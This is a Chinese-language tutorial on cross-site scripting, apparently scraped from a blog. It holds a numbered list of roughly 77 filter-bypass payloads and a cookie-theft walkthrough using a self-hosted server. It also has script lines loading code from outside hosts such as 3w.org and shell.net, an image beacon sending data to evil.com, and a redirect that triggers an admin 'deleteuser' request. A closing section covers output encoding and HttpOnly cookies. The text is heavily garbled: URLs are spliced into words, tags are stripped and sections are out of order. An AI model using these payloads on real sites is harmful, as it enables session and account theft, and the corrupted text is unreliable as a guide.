01、XSS的原理和分类
跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆
故将跨站脚本攻击缩写为XSS,恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页面时,嵌入Web里面的Script代码会被执行,从而达到恶意攻击用户的目的,XSS攻击针对的是用户层面的攻击;
XSS分为:存储型,反射型,DOM型XSS
存储型XSS:存储型XSS,持久化,代码是存储在服务器中,如在个人信息或发表文章等地方,插入代码,如果没有过滤或者过滤不严,那么这些代码将储存到数据库中,用户访问该页面的时候出发代码执行,这种XSS比较危险,容易造成蠕虫,盗取Cookie;
反射型XSS:非持久化,需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面,反射性XSS大多数是用来盗取用户的Cookie信息;
DOM型XSS:不经过后端,DOM-XSS漏洞是基于文档对象模型(Document Object Model ,DOM)的一种漏洞,DOM-XSS是用过url传入参数取控制触发的,其实也属于反射型XSS,DOM的详解:DOM文档对象模型;
【一一帮助安全学习,所有资源获取处一一】
①网络安全学习路线
②20份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥网络安全必备书籍
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析
可能触发DOM型XSS的属性
document.referer
window.name
location
innerHTML
documen.write
02、XSS攻击的危害
1、盗取各类用户账号,如机器登陆账号,用户网银账号,各类管理员账号;
2、控制企业数据,包括读取,篡改,添加,删除企业敏感数据的能力;
3、盗取企业重要的具有商业价值的资料;
4、非法转账;
5、强制发送电子邮件;
6、网站挂马;
7、控制受害者机器向其他网站发起攻击;
03、XSS的测试语句
在网站是否存在XSS漏洞时,应该输入一些标签,如输入后查看网页源代码是否过滤标签,如果没有过滤,很大可能存在XSS漏洞。
常用测试语句:
1
1
可以看到,网站并没有对标签进行过滤;
console.log(1);
可以看到,并没有弹出,但是控制台上输出了1,我们可以确定,确实存在XSS;
闭合问题:很多时候,在测试XSS的时候,想要要考虑到闭合问题,我们首先查看网页的源代码,需要首先判断出来,网站用的时单引号闭合还是双引号闭合;
">https://blog.csdn.net/kali_Ma/article/details/x<"
'>https://blog.csdn.net/kali_Ma/article/details/x<'
单行注释:
">https://blog.csdn.net/kali_Ma/article/details/x//
#双斜杠表示注释掉后面的语句
0https://blog.csdn.net/kali_Ma/article/details/x04、XSS攻击语句
输入检测确定标签没有过滤,为了显示漏洞存在,需要插入XSS攻击代码;
alert(1)aa
(1)普通的 XSS JavaScript 注入
(2)IMG 标签 XSS 使用 JavaScript 命令
(3)IMG 标签无分号无引号
(4)IMG 标签大小写不敏感
(5)HTML 编码(必须有分号)
(6)修正缺陷 IMG 标签
alert("XSS")">
(7)formCharCode 标签(计算器)
(8)UTF-8 的 Unicode 编码(计算器)
(9)7 位的 UTF-8 的 Unicode 编码是没有分号的(计算器)
(10)十六进制编码也是没有分号(计算器)
(12)嵌入式编码标签,将 Javascript 分开
(13)嵌入式换行符
(14)嵌入式回车
(15)嵌入式多行注入 JavaScript,这是 XSS 极端的例子
(16)解决限制字符(要求同页面)
z='document.'z=z+'write("'z=z+'<script'z=z+'src=ht'z=z+'tp://ww'z=z+'w.shell'z=z+'.net/1.'z=z+'js></sc'z=z+'ript>")'eval_r(z)
(17)空字符 12-7-1 T00LS – Powered by Discuz! Board
https://www.a.com/viewthread.php" />
(20)Non-alpha-non-digit XSS
(21)Non-alpha-non-digit XSS to 2
(22)Non-alpha-non-digit XSS to 3
(23)双开括号
<alert("XSS");//<
(24)无结束脚本标记(仅火狐等浏览器)
<SCRIPT SRChttp://3w.org/XSS/https://blog.csdn.net/kali_Ma/article/details/xss.js?
(25)无结束脚本标记 2
(26)半开的 HTML/JavaScript XSS
<IMG SRC="https://blog.csdn.net/kali_Ma/article/details/javascript:alert('XSS')"
(27)双开角括号
<iframe src=http://3w.org/XSS.html <
(28)无单引号 双引号 分号
a=/XSS/alert(a.source)
(29)换码过滤的 JavaScript
\";alert('XSS');//
(30)结束 Title 标签
alert("XSS");
(31)Input Image
(32)BODY Image
(33)BODY 标签
(34)IMG Dynsrc
(35)IMG Lowsrc
(36)BGSOUND
(37)STYLE sheet
(38)远程样式表
(39)List-style-image(列表式)
li {list-style-image: url("https://blog.csdn.net/kali_Ma/article/details/javascript:alert('XSS')");}</STYLE
(40)IMG VBscript
(41)META 链接 url
(42)Iframe
(43)Frame
12-7-1 T00LS - Powered by Discuz!Boardhttps://www.a.com/viewthread.php?action=printable&tid=15267 3/6
(44)Table (55)EMBED 标签,你可以嵌入 FLASH,其中包涵 XSS (67) (68)URL 绕行 各个标签的的攻击语句; svg标签: 标签: style标签: 尽可能找到一切用户可控并且能够输出在页面代码中的地方,比如下面这些: URL的每一个参数 URL本身 表单 搜索框 重灾区:评论区,留言区,个人信息,订单信息等 针对型:站内信,网页及时通讯,私信,意见反馈 存在风险:搜索框,当前目录,图片属性等; 关于XSS的代码审计主要就是从接收参数的地方和一些关键此入手; PHP中常见的接收参数的方法有 G E T , _GET, GET,_POST,$_REQUEST等等,可以搜索所有接收参数的方法,然后对接收到的数据进行跟踪,看看有没有输出到页面中,然后看看输出到页面中的数据是否进行了过滤和html编码等处理 也可以搜索类似echo这样的输出语句,跟踪输出的变量是从哪里来的,我们是否能控制,如果从数据库中取得,是否能控制存到数据库得数据,存到数据库之前有没有得到过滤等等; 大多数程序会对接收参数封装在公共文件得函数中统一调用,我们就需要审计这些公共函数看有没有过滤,能否绕过等等; 同理审计DOM型注入可以搜索一些js操作DOM元素得关键字进行审计; 1、Alice经常浏览某个网站,此网站为Bob所拥有,Bob的站点需要Alice使用用户名、密码进行登陆,并存储了Ailce敏感信息(比如银行账户); 2、Tom发现Bob的站点存在反射的XSS漏洞; 3、Tom利用Bob网站的反射型XSS漏洞编写了一个ehttps://blog.csdn.net/kali_Ma/article/details/xp,做成链接的形式,并利用各种手段诱导Alice点击 4、Alice在登陆Bob的站点后,浏览了Tom提供的恶意链接; 5、嵌入到恶意链接中的恶意脚本在Alice的浏览器中执行,此脚本盗取敏感信息(cookie,账号等信息),然后在Alice完全不知情的情况下将这些信息发送给了Tom; 6、Tom利用获取到的Cookie就可以以Alice的身份信息登陆Bob的站点,如果脚本的功能更强大的化,Tom还可以对Alice的浏览器做控制并进一步利用漏洞控制; 1、Bob拥有一个Web站点,该站点允许用户发布信息,浏览已发布的信息; 2、Tom检测到Bob的站点存在存储型的XSS漏洞; 3、Tom在Bob的网站发布了一个带有恶意脚本的热点信息,该热点信息存储在了Bob的服务器的数据库中,然后吸引其他用户来阅读该热点信息; 4、Bob或者时任何的其他人,如Alice浏览了该信息之后,Tom的恶意脚本就会执行; 5、Tom的恶意脚本执行后,Tom就可以对浏览器该页面的用户发起一次XSS攻击; XSS漏洞能够通过构造恶意的XSS语句实现很多功能,其中做常用的时,构建XSS恶意代码获取对方浏览器的COOKIE; 1)我们首先把恶意代码保存在本地kali里面,实战情况下,我们将代码保存在我们的服务器上; 2)我们在kali,用python开启http服务; python -m http.server 80 3)我们在有XSS漏洞的地方,远程加载我们的恶意代码: 看到浏览器加载了,我们的https://blog.csdn.net/kali_Ma/article/details/xss恶意代码; 4)成功获取到了cookie信息 5)图片创建链接 我们输入3和 可以看到,我们的XSS语句已经插入到数据库中了; 然后当其他用户访问,show2.php页面的时候,我们插入的XSS代码就执行了; 存储型XSS的数据流向是:前端–>后端–>数据库–>后端–>前端 先放源代码: 这里有一个提交页面,用户可以在此提交数据,数据提交之后,给后台处理; 我们可以输入 编码直通车:https://www.jb51.net/tools/zhuanhuan.htm 八进制编码: 16进制编码 jsunicode编码 在=后可以解析html编码 十进制: 十六进制 使用伪协议base64解码执行https://blog.csdn.net/kali_Ma/article/details/xss XSS防御的总体思路是:对用户的输入(和URL参数)进行过滤,对输出进行html编码,也就是对用户提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容,然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行; 对输入的内容进行过滤,可以分为黑名单和白名单过滤,黑名单过滤虽然可以拦截大部分的XSS攻击,但是还是存在被绕过的风险,白名单过滤虽然可以基本杜绝XSS攻击,但是真实环境中一般是不能进行如此严格的白名单过滤的; 对输出进行html编码,就是通过函数,将用户的输入的数据进行html编码,使其不能作为脚本运行; 如下是使用php中的htmlspecialchars函数对用户输入的name参数进行html编码,将其转化为html实体; 我们还可以服务端设置会话Cookie的HTTP Only属性,这样客户端的JS脚本就不能获取Cookie信息了;
(45)TD
(46)DIV background-image
(47)DIV background-image 后加上额外字符
(1-32&34&39&160&8192-8&13&12288&65279) **
**
(48)DIV ehttps://blog.csdn.net/kali_Ma/article/details/xpression
(49)STYLE 属性分拆表达
(50)匿名 STYLE(组成:开角号和一个字母开头)
(51)STYLE background-image
.XSS{background-image:url("https://blog.csdn.net/kali_Ma/article/details/javascript:alert('XSS')");}
(52)IMG STYLE 方式
ehttps://blog.csdn.net/kali_Ma/article/details/xppression(alert("XSS"))'>
(53)STYLE backgroundBODY{background:url("https://blog.csdn.net/kali_Ma/article/details/javascript:alert('XSS')")}(54)BASE
(56)在 flash 中使用 ActionScrpt 可以混进你 XSS 的代码
a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval_r(a+b+c+d);
(57)XML namespace.HTC 文件必须和你的 XSS 载体在一台服务器上
<?import namespace="https://blog.csdn.net/kali_Ma/article/details/xss"
implementation="http://3w.org/XSS/https://blog.csdn.net/kali_Ma/article/details/xss.htc">XSS
(58)如果过滤了你的 JS 你可以在图片里添加 JS 代码来利用
(59)IMG 嵌入式命令,可执行任意命令
(60)IMG 嵌入式命令(a.jpg 在同服务器)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61)绕符号过滤·
" SRC="http://3w.org/https://blog.csdn.net/kali_Ma/article/details/xss.js">
(62)" SRC="http://3w.org/https://blog.csdn.net/kali_Ma/article/details/xss.js">
(63)" " SRC="http://3w.org/https://blog.csdn.net/kali_Ma/article/details/xss.js">
(64)'" SRC="http://3w.org/https://blog.csdn.net/kali_Ma/article/details/xss.js">
(65)<SCRIPT a=
> SRC="http://3w.org/https://blog.csdn.net/kali_Ma/article/details/xss.js">
(66)12-7-1 T00LS - Powered by Discuz! Boardhttps://www.a.com/viewthread.php?action=printable&tid=15267 4/6'>"SRC="http://3w.org/https://blog.csdn.net/kali_Ma/article/details/xss.js">
document.write("<SCRI");PT SRC="http://3w.org/https://blog.csdn.net/kali_Ma/article/details/xss.js">
XSS
(69)URL 编码
XSS
(70)IP 十进制
XSS
(71)IP 十六进制
XSS
(72)IP 八进制
XSS
(73)混合编码
XSS
(74)节省[http:]
XSS
(75)节省[www]
XSS
(76)绝对点绝对 DNS
XSS
(77)javascript 链接
XSS
alert("hack") #弹出hackalert(/hack/) #弹出hackalert(1) #弹出1,对于数字可以不用引号alert(document.cookie) #弹出cookie #引用外部的https://blog.csdn.net/kali_Ma/article/details/xss
<svg onload="alert(1)"//
05、XSS漏洞的挖掘
5.1、黑盒测试
5.2、常见业务场景
5.3、白盒审计
06、XSS的攻击过程
6.1、反射型XSS漏洞:
6.2、存储型XSS漏洞:
07、XSS攻击测试
7.1、远程加载攻击payload
var img=document.createElement("img");img.src="http://www.evil.com/log" />
alert(/https://blog.csdn.net/kali_Ma/article/details/xss/)
,接着,我们看看数据库;
7.4、DOM型XSS
// 前端3.html
8.4、ascii编码
alert(String.fromCharCode(88,83,83))
8.5、url编码
123
8.6、JS编码
eval("\141\154\145\162\164\50\61\51");
eval("\https://blog.csdn.net/kali_Ma/article/details/x61\https://blog.csdn.net/kali_Ma/article/details/x6c\https://blog.csdn.net/kali_Ma/article/details/x65\https://blog.csdn.net/kali_Ma/article/details/x72\https://blog.csdn.net/kali_Ma/article/details/x74\https://blog.csdn.net/kali_Ma/article/details/x28\https://blog.csdn.net/kali_Ma/article/details/x31\https://blog.csdn.net/kali_Ma/article/details/x29")
\u0061\u006c\u0065\u0072\u0074('https://blog.csdn.net/kali_Ma/article/details/xss');
8.7、HTML编码
''
8.8、base64编码
111
0https://blog.csdn.net/kali_Ma/article/details/x09、XSS的防御
#使用htmlspecialchars函数对用户输入的name参数进行html编码,将其转换为html实体$name = htmlspecialchars( $_GET[ 'name' ] );